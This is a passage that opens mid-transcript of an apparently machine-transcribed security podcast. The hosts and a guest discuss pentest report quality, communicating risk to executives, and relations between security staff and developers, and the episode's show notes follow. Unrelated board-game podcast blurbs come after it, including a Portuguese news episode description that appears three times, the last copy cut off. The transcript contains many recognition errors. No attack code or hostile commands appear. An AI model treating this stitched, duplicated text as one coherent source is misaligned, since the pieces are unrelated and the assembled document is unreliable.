door... You know, and it's like the best time to figure that out. Then you always like, I always tell people that. Yeah, the best time to fix a bug is an alpha before you write anything... And the next best time to fix it is before it goes into production. And the worst possible time to fix a bug is after I've been in prod for 10 years, and it's a it's a load bearing bug at this point. It has dependencies on it Bryan Brake 20:30 you know what, it's funny you mentioned that I've been seeing some like Linux kernel bugs they said there was one in there for like 15 years old at affected all of like 2.6.x to up to the latest version. It was a use after free bug, you know that I don't know if they found the bug 15 years ago and just never fixed it but yeah, bugs like that sit in there because people don't don't check for that kind of stuff... Brian "Noid" Harden 20:51 that happens sometimes those the well I mean, God remember that. Remember the whole SYN flood thing in the 90s? Yeah, I mean it was it was it was in the RFC... One of those like, like, Oh, we found the bug. It's like what? You read the RFC. And just finally understood it. You know, so it's, it's that stuff. And there was an SSH bug that popped up recently. Yep. It was the same thing. It wasn't a terribly nasty critical bug. But it was, in a piece of code that had been in SSH for ever. Bryan Brake 21:26 Yeah. I seem to remember that one, too. Yeah. I'll have to find a link to that one. So I know you're getting tired. I have one other topic I'd like to discuss because I do a lot of report writing. Well, I I probably should do a lot of report writing but at Leviathan we you know we're the PM grease the wheels we you know, work with a relationship with the the status meetings, we do the executive summary and such and I could be better writing reports some of our testers are way better at it than I am... You know, taking the taking the whole idea of the language and where where things go with this, when we, when we put findings out, we've won, we call them bugs where we call them findings, not necessarily bugs. But what I'm trying to figure out is how we can better communicate our reporting, when we're doing things like readouts, to you know, kind of resonate with both developers and management because the idea is the executive summary is supposed to be for the "managers" or senior folk and then we have like, you know, components that drill down and talk about specifics and be more technical, but, you know, often we find ourselves and I find myself because I come from a more technical background writing more technical to the executives and my question was, Is there ways of communicating risk to both the developers and the managers in the, you know, using using somewhat the same language? Or should we call the bugnot bugs or not findings. We call them, you know, hey, here's a feature you guys should implement, which would be, you know, HTTP or, you know, you must have seen a few pen test reports in your time. And I mean, what is what is your opinion of pen test reports? Brian "Noid" Harden 23:13 So, my opinion, the most pen test reports, is that their garbage... Well, they're usually written to, they're usually written to one extreme or the other. So unfortunately, I have yet to find any really good language that appeases everybody. Brian Boettcher 23:30 So what's the one extreme or the other? Brian "Noid" Harden 23:32 What are the two extremes they're either hyper technical, the sort of stuff that like any of the three of us would probably look at and go, Okay, I get it, right. I understand the value here or there so high level that if I'm a business person, I might be sitting there going, Hey, okay, you know,you've you've reached out you've touched my heart. I understand that this this is a critical like this is a big issue we need to get fixed. But there's not enough meat there that if I took that report and handed it off to my dev lead and said, go fix this. The dev lead is going to sit there and go... Brian Boettcher 24:09 Are you kidding me? Brian "Noid" Harden 24:10 Yeah. Like, I don't know what to fix, according to this report says bad things can happen on the network. Are you telling me to go prevent bad things from happening on the network? So that's the thing. I find that Yeah, they either overwhelm you with details or there's not enough substance to them. Okay, so every once in a while, you get a really good one though, you get a you get a you get a really good one. If I could look at just a shout out to CoalFire actually, like their reports. Unknown 24:39 I mean, okay, So, What is a happy medium type report for you? One that would satisfy the manager folks but also get with, you know, be technical enough. What kind of things would you like to see in reports that you get from them and feel free to you know, talk about the Coalfire thing I guess Brian "Noid" Harden 25:02 *Chuckles* Bryan Brake 25:06 *Chuckles* We're always trying to improve our reports that Leviathan we've gone through and done things like test evaluations and you know things like that and no it's fine you know they're they're cool with me doing my podcast on the side so but if you had when you get reports... the good ones... What do they look like well I mean what what kind of things that you're looking for and and and in a pen a proper pentest report? Brian "Noid" Harden 25:30 Well for me being a technical person one of the things... the biggest thing I'm looking for in a report repro steps, right? If you haven't given me clear repo steps, then you have given me a useless report and that's the thing I've seen reports were basically it's... you know, hey man, we all we popped your domain controller you know, we did this we did that. Look at all freaking awesome we are... And you're like, Okay, I didn't hire you guys to be a circus sideshow. I hired you guys to show me where my risk is, and so I can focus my I know where to focus my efforts. And so those types of so those types of like, "look at how badass I am" reports don't do anything for me... what I do like there were reports that say hey you know we found a cross site scripting vulnerability on this particular product in this particular area. And here is not only screenshots of the cross site scripting vulnerability happening, but here's the repro steps because what's going to happen is, for example, you know, I see something like that and I go, Well, we got to fix that. I'm going to go to my developers. And the first thing my developers are going to ask me is, can you repro it? Can I read through it because one of the things they're going to do is after they fix it, they're going to validate the fix if they don't know how it was exploited in the first place. They're not going to know how to validate the fix. So being able to provide that information... down is is huge for me. Um, but then again, I'm also not, you know the business guy, I'm not the big money guy, I'm I want my report to be technical right so would the executives of my company get the same value out of the report? I probably not... you know when you're talking to the much higher level non technical people what you need to be doing is you need to be making sure you're talking in terms of risk. Sure, you know, you're talking in terms of risk and you're talking in terms of a not technical risk... You know, at the end of the day, the CEO of the company doesn't give a damn that SMBv1 is still on the network, right? They might not even know what that is, right? odds are I'm gonna I'm gonna go out and say they probably don't know what that is. Um, and even in that doesn't mean explain to them what it is because they're not going to care so first. We're going to go from not knowing what it is to not caring what it is. But if you express things in terms of risk of that, you know, the current network architecture, as it stands is very fragile and could be easily brought down, you know, through almost potentially accidental behavior, let alone. malicious behavior. You know, resulting in outages and SLA violations right now, you got their attention, because what they hear there is also if I don't fix this, it might cost me money. Brian Boettcher 28:36 profit loss. Brian "Noid" Harden 28:37 Yeah, and that's the thing. It's the, you know, depending on where they're at, in the org structure, you know, I've been in I've been in plenty of organizations before where downtime... downtime is bad... downtime is just, I mean, downtime is never good. But I mean, I've been in organizations where it's like, okay, so I just got promoted to like, super uber director guy. 48 hours into the gig. You know, we had like, a two hour outage,... I'm done. Bryan Brake 29:08 Busted that SLA, big money... Brian "Noid" Harden 29:10 even though even though I had nothing to do with it, I'm the accountable one. So, yeah, you have, you know, you need to be able to express things in terms that they translates to, you know, finding out like, like one of the things I back when I used to be a consultant, one of the things I always ask the executive types I'd meet on jobs is what keeps you up at night. You know, what keeps you up at night? Like what you know, don't don't worry about what I'm concerned about, what are you concerned about? Because they might be the same thing. I'm just going to talk to you about it using again, using the words that you care for and understand because I see a lot of technical people try to describe risk to non technical people and they do it by being highly technical and when it's not being understood. They fall back to being even more they take the approach of being in France... not speaking French. So I'm going to speak slower and louder, right? And, and at the end of the day, they're just going to keep shaking their heads going, Man, this guy really wants to express something to make. Bryan Brake 30:18 Yeah, something must be really important... Brian "Noid" Harden 30:20 ...to agitated by it. I don't know what it is... Bryan Brake 30:23 Great, now it's blue monkey poo. I don't know what's going on. Brian "Noid" Harden 30:26 Yeah, so that's, that's it. So yeah. When you're when you're talking to leadership, expressing things in terms of the contract violations, SLA violations, financial financial impact, right? You know, like, like, one of the things I liked when PCI came out and they had like these ridiculous up to $10,000 per bit of PII that gets disclosed and then you explain to a room full of high level people that and if blank were to happen 40,000 bits of PII .would be exposed a you knnow and I'm not so good at math but my calculator here tells me at $10,000 a pop and you watch people in the room real quiet... Bryan Brake 31:10 oh yeah no that now you know the thing is you just haven't seen a Leviathan one yet so you know if you want to you know reach out to us we'll do a pentest for you we when we don't mind coming out and hanging out doing pen tests for you so Brian "Noid" Harden 31:24 Frank's a good friend, solid solid human being Bryan Brake 31:26 no I mean will take your money and will give you a good will give you good drubbing. You will not get up and down left and right. You'll make it hurt. So anyway, actually, yeah, we we actually might need to talk about that a little bit later. I would not hate on that. I get money when people come in its new business. So yeah, I wouldn't hate on that at all. Brian Boettcher 31:47 I like in in your last phrase or last sentence in your presentation. If you can, avoid even using the word security. I think that's a good summary of what we talked about. Bryan Brake 32:00 Yeah, that got me too. I was like, Wow. Okay. So it's like, it's like the buzzword you're not supposed to say or, you know, like, you get a shock.. Brian "Noid" Harden 32:08 Treat it like a game. Yeah. Yeah, you got it like a game. But you you'd be amazed it works Bryan Brake 32:16 hundred percent of the time. It works every time? Brian "Noid" Harden 32:18 Yeah, hundred percent of the works every time. But, ya know, it it it definitely works because there are people too because there's conditioning, right. The history between security people and software developers is deep and it goes back Bryan Brake 32:33 it's contentious Brian "Noid" Harden 32:34 it's contentious at times. And, you know, obviously, you know, you try to try to try to be a good human being, trying to better the world around you. You know, try to,when you whenever you go somewhere, try to leave it in a better condition than you found it. But also understand that the person who may have been there for you may have just straight up just f the place up Brian Boettcher 32:58 scorched earth Brian "Noid" Harden 32:59 Yep, yeah. so and so. Yeah. And sometimes, because, I mean, I've got, I've rolled into organizations before where it's like, Why are these people so mad at me? I just got here... And it's like, oh, because the guy you replaced was just got off. And then and it sucks because it's not fair that you have to rebuild those damaged relationships because you didn't damage them. but life ain't fair? Bryan Brake 33:22 Yep. Well, you know, what, the, the, the whole, you know, DevOps and those things, that was the, you know, the Elysian Fields for developers like, Oh, I can go do anything and enjoy everything, and then it's like, you know, we're, the "no" department where the, we're the where the ones are going to put manacles on them. So, you know, security folks have have got to learn to be flexible, compliance folks can't wield their hammer anymore, like they, they should, if they want to, you know, play with the developers in the devops and the management folks, we talked about this with Liz rice couple weeks ago about getting, you know, security into the devops area and it's like one we got it we gotta learn to be flexible we've got to help them understand that now yeah the bug feature stuff if I'd heard this when we were talking to her I'm almost certain she would agree with us on the fact that you know we can't treat security like security we have treated as feature enhancement in this case Brian "Noid" Harden 34:16 it is a feature, you know it is a feature and increase the stability of the product that can get increases the customer base of the product it's right it has all the same things to it that any other feature would, but yeah but as far as the security being the note apartment thing to something else is like I still run into security people that they look at themselves as the "No" department that kind of pride themselves on Yeah, and when you find those people just call them out. I mean, just just tell them like, Look, man, that doesn't work. It's never work. Stop it now. Because when you're viewed as the "no" department, no one will ever want to work with you. Why would you want to? Bryan Brake 34:57 Yep... you're a non-starter Brian "Noid" Harden 34:59 Yeah, what's go because that was a bit of career advice I got at one point was that basically be solutions focused. You know, nobody wants to basically you're not going to go anywhere if you're the person who's calling out the problem and you might be calling out the problem more articulately than anybody else in the room, you might have a better understanding of the scope of them the depth of the problem, but there is a whole class of manager out there that will just be like, Man, that Noid guy, nothing but problems. Whereas if you instead say, you know, you kind of focus on the sort of the not really the problem, but rather you focus on the solution... "be solutions oriented" to sound like a business guy for a second. And it's like, yeah, you'd be that solutions oriented person, and especially if you can do it with a sort of positive spin, like I had a boss at one point I would stop in his office pissed off every once in a while, and I just be like this is screwed up and that screwed up and blah, blah blah. And he stopped and go "leave my office now and come back in and restate everything you just said. But in a positive way." I don't even know how it will then go sit in the hallway for a few minutes she would come back and I'd be like, okay,we have an opportunity for us. And I tell you I hated them for it. But name if it didn't work. Bryan Brake 36:32 Oh god. Yeah, that would make complete sense. Yeah, coming in with a positive instead of negative. Brian "Noid" Harden 36:40 So that's the thing. It's like yeah, even when your negativity is spot on and accurate. There's a lot of people that are like.. "ugh the person is always negative" And then sure enough, yeah, you start focusing on like, oh, you're the positive solutions oriented guy. Even while you're telling them that it's all basically like we're all going to Hell, but I'm doing it in a positive solutions oriented manner, and you'd be amazed how much traction I get you. Bryan Brake 37:06 Mr. Boettcher, do you have any other thoughts or questions? I want to let Mr.Noid go, cuz he's getting a little ty ty, he's a bit sleepy and he needs to go to bed... Brian Boettcher 37:15 There's a lot of great tidbits in here. I'm gonna have to listen to it again, and get all of them. And, and again, there's a lot of manager tools references here and, and manager tools, if you're not a manager, that's okay. It's not for managers, all that stuff they talk about is is really valuable to all employees. Brian "Noid" Harden 37:39 What's it called, the manager tools podcast? Bryan Brake 37:42 Yep.It's been going on for 12 years. Brian Boettcher 37:45 Since 2006 Bryan Brake 37:46 Yeah, something like that. It's it's very big. We put a link to the three powers three types of power and one to rule them all in the in the show notes as well. So yeah, go listen to that. I listened to that it's it's one of my regular non-info sec podcast that I listened to, so I listen to it every Monday morning, and when I'm on the treadmill at the gym, so yeah, really, really excellent stuff. If you're, you're out there and, you know, yeah, I mean, it'll help you kind of understand, but if you're out there and you're not a manager yet, it might help you understand where your managers coming from, too. All right. Mr. Noid how would people get a hold of you if they wanted to maybe have you for more podcasts appearances or, you know, speaking engagements or whatever? Are you going to be speaking anywhere soon? Brian "Noid" Harden 38:39 Am I I don't know. No, I don't think I am right. Sorry. Are you going anywhere? So question? I am there you go. I am speaking soon. Yeah, I'm, I'm speaking at the NCC group. Open Forum. Oh, that's right. That's next weekend. I don't think it's actually been announced yet. Okay. It's I mean, it's cool for me to talk about it. But yes, it's... Bryan Brake 39:02 the 12 (of March) yeah it is the 12th in Fremont, so if you're outside of the Seattle area you're going to be SOL.. yeah they don't record that Brian "Noid" Harden 39:15 but but I'm going to be giving basically the abbreviated version of my besides talk. they had they had an empty slot they needed to fill up... and they basically said could you do it I said sure and then they said it's 30 minutes long and I'm like well my talks an hour, but how will will make it work... they're I think they're a Tableau up in Fremont... Bryan Brake 39:37 yeah I'm on that list and yeah I know Miss Crowell over there who's one of the senior managers at NCC she's great lady... she's actually not running she used to run it and and gave somebody else but she still helps out a when she can but yeah, really, really great quarterly open forum that NCC group puts out. Plus they put out a nice spread for dinner certainly good Brian "Noid" Harden 40:00 I haven't been the one in a while, but they usually a lot of fun. I wouldn't last one of those I went to was a TLS 1.3 Bryan Brake 40:09 I was at that one too. Brian "Noid" Harden 40:10 That worked out great. Because literally the following weekend, I spoke at DC 206 nice about TLS 1.2 right? and ended up getting Joe to come along and speak about TLS 1.3 and a much more authoritative manner than I could have. It's bad ass. Bryan Brake 40:24 Yeah, Joe. Joe was on the steering committee for that. Brian "Noid" Harden 40:28 Yep. Yeah, I think but yeah, that was also nice. He kept me honest. While I was given my talk. I periodically just look at them any kind of nod. I'm not going into the weeds yet. But yeah, as far as getting a hold of me goes the best way to do it is I'm on Twitter @_noid_ or you can email me at noid23@gmail.com Bryan Brake 40:52 Yeah so yeah if you're in the Seattle area and the downtown Seattle area or Fremont area that's really nice place I think parking I think was at a premium The last time we were there Brian "Noid" Harden 40:52 It's Fremont, parking is always at a premium Bryan Brake 40:52 they're dodging bikes or whatever like motorized bicycles or whatever so you know Brian Boettcher 40:52 scooters now Bryan Brake 40:52 yeah I mean Fremont area they're really weird about their bicycle laws and stuff up there so Brian "Noid" Harden 41:07 ...and zoned parking so watch for your park too Bryan Brake 41:32 I'm going to get Miss Berlin because you know she's got a lot going on she's you know heading up the mental health hackers group.. you can find her was it hacker... god I hate this, um... she's @infosystir on Twitter. hackers mental health is her nonprofit. She's running that and you can find that @hackershealth on Twitter, she will come to your convention or conference and do a village. And and, you know it's a nice chill area you can go to, if you're interested in doing that Brian "Noid" Harden 42:12 is truly doing the Lord's work too. Bryan Brake 42:14 Yes she is. And we're very proud of her for all that she's doing. So yeah, her and Megan Roddy who's also one of our slack slack moderators... So speaking of our slack we have a very active slack community we just like I said we have "JB" who was promoted to moderator because it's been far too long and he's been doing the the European and Asia book club and he should have been a moderator for a while so did that today gave him access to our secret moderator channel and such and but yeah we have a social contract you can join us by emailing bds.podcast@gmail.com or hitting our Twitter which is the the podcast Twitter @brakesec and you can follow me on Twitter.@bryanbrake. Mr. Boettcher, you got a lot going on to sir how would people find you if we wanted to talk about the log MD stuff? Brian Boettcher 43:10 yeah you just go to log-MD.com... Don't forget the dash right otherwise you'll you'll get some well nevermind... Bryan Brake 43:20 Is it like WhiteHouse.com *laughs* that's an old joke kids! Brian Boettcher 43:26 I'd like to say though if you if you do go by your developers donuts or whoever don't eat any between the pickup and drop off right because then you'll show up with four donuts and they'll be like oh thanks great there's 10 of us and you bring us for Donuts Bryan Brake 43:41 {imitating Forrest Gump]"I had some sorry" Don't do that yeah yea buy 13 donuts and then eat one for yourself and then say you got it doesn't you go yeah so you're making an appearance you're going to be Bsides Austin at the end of the month along with Ms. Berlin's going to be that one as well. I think? Brian Boettcher 44:00 I am... Megan's going to be there I'm not sure. Very cool as her home base so we'll see. Nice. Yeah and the classes are cheap. I don't know if they're sold out yet but it's like $100 bucks. Bryan Brake 44:13 Okay, awesome. Cool. Before we go, we have a store. If you want to go buy a T shirt for the Brakeing Down Security logo, you know, you can definitely go do that or get one with Miss Berlin's face on it. Which is very weird but it's still very cool I'm going to probably by pink one here in the next few weeks and thank you to our patrons people who help support the podcast but donating some money helps pay for hosting pays for the time that we're doing this also we're looking into adding some possible transcription services we've gotten a couple emails from people who are saying they want to get transcriptions of us saying "uh, um, ah" lot so I actually actually it was a gentleman by the name of Willie I think was said head hearing difficulties so he wanted to know if we had a transcription of the podcast and I feel really bad because I'm like I don't know how to reply to him and say I you know we're just a little mom and pop shop here so we're looking at transcription services maybe something like Mechanical Turk or there was one called otter.ai that we're we're looking at to maybe kind of make it better for people to hear these things Brian "Noid" Harden 45:26 I'm actually actually suffer from degenerative hearing loss. I'm slowly going deaf myself Bryan Brake 45:31 I've got tinnitus is from the Navy Brian "Noid" Harden 45:32 same here. It's permanent and ongoing. And just yeah, it's like I feel for him. Yep. And hopefully transcriptions will be a thing at some point. Yeah, god's I hope so. Yeah, I mean, other than the US and about 800 times during podcast I apologize for that. But yeah, so we're, we're trying to look into that if if we can make it work we will we will do our utmost to make the podcast as available as possible to everybody. So in end up to be we have to hire somebody, he'll do it for us. So that that may be another thing, which means will need more pot Patreon money, you know that kind of thing. So if you're interested in getting full transcripts we may make that possible if we can get another maybe 20 to 30 people a 20-30 bucks a month. So but we do appreciate that the tips the you know we call them tips because you're helping to support the podcast and helping us get this out. And yeah, so for Miss Berlin who's not here sadly. And she's going to be kicking yourself because this was a really awesome podcast and Mr. Boettcher. This is Brakeing Down Security from a world headquarters here in Seattle. Have a great week. Be nice to another. Please take care of yourselves because you're the only you have and we'll talk again soon. Brian Boettcher 46:45 Bye bye Brian "Noid" Harden 46:46 Bye Internet people. Transcribed by https://otter.ai

Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)     SeaSec East meetup     "Gabe"   https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/   New Slack Moderator (@cherokeeJB) Shoutout to “Jerry G”   Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407 www.Workshopcon.com/events and that we're looking for BlueTeam trainers please   Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet   Noid - @_noid_ noid23@gmail.com   Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3 Slides (PDF) https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf   Security view was a bit myopic? “What do we win by playing?” Cultivating relationships (buy lunch, donuts, etc) Writing reports Communicating findings that resonate with developers and management     Often pentest reports are seen by various facets of folks     Many levels of competency (incompetent -> super dev/sec)   Communicating risk? Making bugs make sense to everyone…   The three types of power: https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1    Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel:  http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site:  https://brakesec.com/bdswebsite #iHeartRadio App:  https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Have you ever wanted to beat all of your friends at a game? Jack and Joel talk about the concept of One Vs. Many, where a single player takes on the rest of the gaming group. Some popular titles in this vein: Scotland Yard, Fury of Dracula, and Specter Ops

André Zabuzeta traz as notícias da semana no Jogatina BG News e logo depois, Jack recebe Fabrício do canal @After Match para um papo sobre suas impressões da CCXP 2018. 1 - A editora Thunderworks Games anunciou para 2019 o jogo Cartographers: A Roll Player Tale - jogo do brasileiro Jordy Adan com mecânica papel e caneta para 2-99 jogadores, onde os jogadores são cartógrafos que disputam por mais reputação na terras do norte no final de 4 estações. Em cada estação os jogadores, através de desenhos em suas folhas de mapa, buscam atender as demandas da Rainha Gimnax via controlar regiões com postos avançados e reduzir o avanços dos Draguls. http://bit.ly/2QttCEU 2 - Durante as atualizações no KS do Project: ELITE a CMON anunciou a próxima campanha será do Blood Rage Digital. Essa versão digital será para modos single e multiplayer, além disso a campanha terá alguns conteúdos exclusivos para a versão física do título. https://www.kickstarter.com/projects/cmon/blood-rage-digital 3 - A editora Calliope Games anunciou que em 2019 terá uma campanha através do Kickstarter do Tsuro: Phoenix Rising - esse título será uma reimplementação do clássico Tsuro e terá miniaturas de fênix para 2-8 jogadores. https://boardgamegeek.com/boardgame/266177/tsuro-phoenix-rising 4 - A Stonemaier Games publicou um teaser do seu próximo título: Wingspan, desenvolvido por Elizabeth Hargrave e atenderá de 1-5 jogadores. Conforme a página do jogo no BGG o jogo contará com sistema de carddriven, rolagem de dados e elementos de engine building: https://boardgamegeek.com/boardgame/266192/wingspan 5 - a editora Ludofy anunciou a fusão entre as editoras Mandala Jogos e Ludofy - sob o título GROK - conforme a imagem abaixo, os títulos voltados para o público infantil, festivo, familiar e casual ainda será publicado via Mandala Jogos, e os títulos a partir de casual até pesado ficará sob a Ludofy. Confiram mais informações divulgadas na transmissão do Rafael Verri: https://www.facebook.com/ludofy/videos/512741015869594 6 - A editora CMON em parceira com a Cranio Creations anunciaram para início de 2019 o Walls of York - um jogo para 2-4 jogadores que tem como objetivo construir barreiras, com peças plásticas num tabuleiro em grid, para proteger suas cidades das pilhagens vikings, e quem conter mais moedas no final da 2ª era vence o jogo. https://www.boardgamegeek.com/boardgame/247980/walls-york 7 - Durante o evento PAX Unplugged 2018, que rolou entre 30/11 e 02/12 de 2018 na Pensilvânia em Philadelphia, a IDW Games anunciou o jogo de tabuleiro de Metal Gear Solid, que será do designer Emerson Matsuuchi, que é designer do jogo Specter Ops e da série Century: Rota das Especiarias. Será um jogo de espionagem tática cooperativa para 1-4 jogadores baseada na famosa franquia de video game criada por Hideo Kojima. https://www.google.com/search?q=metal+gear+solid&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj7g8arw5jfAhWDFZAKHfIhBmcQ_AUIDigB&biw=1920&bih=976#imgrc=_ 8 - Na última terça-feira, dia 04/12, durante a transmissão aqui no canal do Meeple Maniacs a Galápagos Jogos anunciou para o mercado brasileiro o KeyForge: Call of the Archons e a publicação está prevista para o 1º semestre de 2019. http://bit.ly/keyforgebr 9 - {KS} Começou via Kickstarter a campanha pela Awaken Realms do Tainted Grail: Fall of Avalon - um jogo cooperativo de aventura no universo dos contos Arthuriano para 1-4 jogadores com 8 miniaturas, 4 tabuleiros de jogador, muitas cartas, manuais e livros, e que garante uma campanha de 15 cenários com 30-40 horas de duração. Já arrecadou US$ 1,945,275 dos US$ 50,910 pedidos, com 17,957 apoiadores e faltam 22 dias para o final da arrecadação. https://www.kickstarter.com/projects/awakenrealms/tainted-grail-the-fall-of-avalon Este programa é um oferecimento de nossos assinantes.Seja um colaborador mensal do canal em https://www.catarse.me/meeplemaniacs

André Zabuzeta traz as notícias da semana no Jogatina BG News e logo depois, Jack recebe Fabrício do canal @After Match para um papo sobre suas impressões da CCXP 2018. 1 - A editora Thunderworks Games anunciou para 2019 o jogo Cartographers: A Roll Player Tale - jogo do brasileiro Jordy Adan com mecânica papel e caneta para 2-99 jogadores, onde os jogadores são cartógrafos que disputam por mais reputação na terras do norte no final de 4 estações. Em cada estação os jogadores, através de desenhos em suas folhas de mapa, buscam atender as demandas da Rainha Gimnax via controlar regiões com postos avançados e reduzir o avanços dos Draguls. http://bit.ly/2QttCEU 2 - Durante as atualizações no KS do Project: ELITE a CMON anunciou a próxima campanha será do Blood Rage Digital. Essa versão digital será para modos single e multiplayer, além disso a campanha terá alguns conteúdos exclusivos para a versão física do título. https://www.kickstarter.com/projects/cmon/blood-rage-digital 3 - A editora Calliope Games anunciou que em 2019 terá uma campanha através do Kickstarter do Tsuro: Phoenix Rising - esse título será uma reimplementação do clássico Tsuro e terá miniaturas de fênix para 2-8 jogadores. https://boardgamegeek.com/boardgame/266177/tsuro-phoenix-rising 4 - A Stonemaier Games publicou um teaser do seu próximo título: Wingspan, desenvolvido por Elizabeth Hargrave e atenderá de 1-5 jogadores. Conforme a página do jogo no BGG o jogo contará com sistema de carddriven, rolagem de dados e elementos de engine building: https://boardgamegeek.com/boardgame/266192/wingspan 5 - a editora Ludofy anunciou a fusão entre as editoras Mandala Jogos e Ludofy - sob o título GROK - conforme a imagem abaixo, os títulos voltados para o público infantil, festivo, familiar e casual ainda será publicado via Mandala Jogos, e os títulos a partir de casual até pesado ficará sob a Ludofy. Confiram mais informações divulgadas na transmissão do Rafael Verri: https://www.facebook.com/ludofy/videos/512741015869594 6 - A editora CMON em parceira com a Cranio Creations anunciaram para início de 2019 o Walls of York - um jogo para 2-4 jogadores que tem como objetivo construir barreiras, com peças plásticas num tabuleiro em grid, para proteger suas cidades das pilhagens vikings, e quem conter mais moedas no final da 2ª era vence o jogo. https://www.boardgamegeek.com/boardgame/247980/walls-york 7 - Durante o evento PAX Unplugged 2018, que rolou entre 30/11 e 02/12 de 2018 na Pensilvânia em Philadelphia, a IDW Games anunciou o jogo de tabuleiro de Metal Gear Solid, que será do designer Emerson Matsuuchi, que é designer do jogo Specter Ops e da série Century: Rota das Especiarias. Será um jogo de espionagem tática cooperativa para 1-4 jogadores baseada na famosa franquia de video game criada por Hideo Kojima. https://www.google.com/search?q=metal+gear+solid&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj7g8arw5jfAhWDFZAKHfIhBmcQ_AUIDigB&biw=1920&bih=976#imgrc=_ 8 - Na última terça-feira, dia 04/12, durante a transmissão aqui no canal do Meeple Maniacs a Galápagos Jogos anunciou para o mercado brasileiro o KeyForge: Call of the Archons e a publicação está prevista para o 1º semestre de 2019. http://bit.ly/keyforgebr 9 - {KS} Começou via Kickstarter a campanha pela Awaken Realms do Tainted Grail: Fall of Avalon - um jogo cooperativo de aventura no universo dos contos Arthuriano para 1-4 jogadores com 8 miniaturas, 4 tabuleiros de jogador, muitas cartas, manuais e livros, e que garante uma campanha de 15 cenários com 30-40 horas de duração. Já arrecadou US$ 1,945,275 dos US$ 50,910 pedidos, com 17,957 apoiadores e faltam 22 dias para o final da arrecadação. https://www.kickstarter.com/projects/awakenrealms/tainted-grail-the-fall-of-avalon Este programa é um oferecimento de nossos assinantes.Seja um colaborador mensal do canal em https://www.catarse.me/meeplemaniacs

André Zabuzeta traz as notícias da semana no Jogatina BG News e logo depois, Jack recebe Fabrício do canal @After Match para um papo sobre suas impressões da CCXP 2018. 1 - A editora Thunderworks Games anunciou para 2019 o jogo Cartographers: A Roll Player Tale - jogo do brasileiro Jordy Adan com mecânica papel e caneta para 2-99 jogadores, onde os jogadores são cartógrafos que disputam por mais reputação na terras do norte no final de 4 estações. Em cada estação os jogadores, através de desenhos em suas folhas de mapa, buscam atender as demandas da Rainha Gimnax via controlar regiões com postos avançados e reduzir o avanços dos Draguls. http://bit.ly/2QttCEU 2 - Durante as atualizações no KS do Project: ELITE a CMON anunciou a próxima campanha será do Blood Rage Digital. Essa versão digital será para modos single e multiplayer, além disso a campanha terá alguns conteúdos exclusivos para a versão física do título. https://www.kickstarter.com/projects/cmon/blood-rage-digital 3 - A editora Calliope Games anunciou que em 2019 terá uma campanha através do Kickstarter do Tsuro: Phoenix Rising - esse título será uma reimplementação do clássico Tsuro e terá miniaturas de fênix para 2-8 jogadores. https://boardgamegeek.com/boardgame/266177/tsuro-phoenix-rising 4 - A Stonemaier Games publicou um teaser do seu próximo título: Wingspan, desenvolvido por Elizabeth Hargrave e atenderá de 1-5 jogadores. Conforme a página do jogo no BGG o jogo contará com sistema de carddriven, rolagem de dados e elementos de engine building: https://boardgamegeek.com/boardgame/266192/wingspan 5 - a editora Ludofy anunciou a fusão entre as editoras Mandala Jogos e Ludofy - sob o título GROK - conforme a imagem abaixo, os títulos voltados para o público infantil, festivo, familiar e casual ainda será publicado via Mandala Jogos, e os títulos a partir de casual até pesado ficará sob a Ludofy. Confiram mais informações divulgadas na transmissão do Rafael Verri: https://www.facebook.com/ludofy/videos/512741015869594 6 - A editora CMON em parceira com a Cranio Creations anunciaram para início de 2019 o Walls of York - um jogo para 2-4 jogadores que tem como objetivo construir barreiras, com peças plásticas num tabuleiro em grid, para proteger suas cidades das pilhagens vikings, e quem conter mais moedas no final da 2ª era vence o jogo. https://www.boardgamegeek.com/boardgame/247980/walls-york 7 - Durante o evento PAX Unplugged 2018, que rolou entre 30/11 e 02/12 de 2018 na Pensilvânia em Philadelphia, a IDW Games anunciou o jogo de tabuleiro de Metal Gear Solid, que será do designer Emerson Matsuuchi, que é designer do jogo Specter Ops e da série Century: Rota das Especiarias. Será um jogo de espionagem tática cooperativa para 1-4 jogadores baseada na famosa franquia de video game criada por Hideo Kojima. https://www.google.com/search?q=metal+gear+solid&source=lnms&tbm=isch&sa=X&ved=0ahUKEwj7g8arw5jfAhWDFZAKHfIhBmcQ_AUIDigB&biw=1920&bih=976#imgrc=_ 8 - Na última terça-feira, dia 04/12, durante a transmissão aqui no canal do Meeple Maniacs a Galápagos Jogos anunciou para o mercado brasileiro o KeyForge: Call of the Archons e a publicação está prevista para o 1º semestre de 2019. http://bit.ly/keyforgebr 9 - {KS} Começou via Kickstarter a campanha pela Awaken Realms do Tainted Grail: Fall of Avalon - um jogo cooperativo de aventura no universo dos contos Arthuriano para 1-4 jogadores com 8 miniaturas, 4 tabuleiros de jogador, muitas cartas, manuais e livros, e que garante uma campanha de 15 cenários com 30-40 horas de duração. Já arrecadou US$ 1,945,275 dos US$ 50,910 pedidos, com 17,957 apoiadores e faltam 22 dias para o final da arrecadação. 